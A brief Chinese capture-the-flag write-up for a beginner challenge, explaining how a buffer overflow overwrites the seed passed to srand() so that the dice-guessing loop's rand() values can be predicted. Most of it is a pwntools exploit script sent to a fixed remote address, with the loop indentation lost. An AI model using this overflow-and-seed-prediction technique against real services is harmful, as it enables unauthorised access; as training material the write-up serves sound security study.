说明
这其实是一种类型题,新手刚开始会碰到,题目大致过程是 有个srand()的随机函数.需要覆盖 seed种子
即srand(seed) 把 seed 覆盖为一个固定的数 , srand 就是伪随机函数了, 题目会有个猜数循
环,比如猜对了20次flag就有了,和这道题类似的题目还有新手区的guess_num
解题
点进去read中的 buf;
EXp
from pwn import *
from ctypes import *
p=remote('111.200.241.244','38298')
libc = cdll.LoadLibrary("libc.so.6")
p.recvuntil("Welcome, let me know your name: ")
payload=0x40*"a"+p64(0)
p.sendline(payload)
libc.srand(0)
for i in range(50):
p.recvuntil("Give me the point(1~6): ")
p.sendline(str(libc.rand()%6+1))
p.interactive()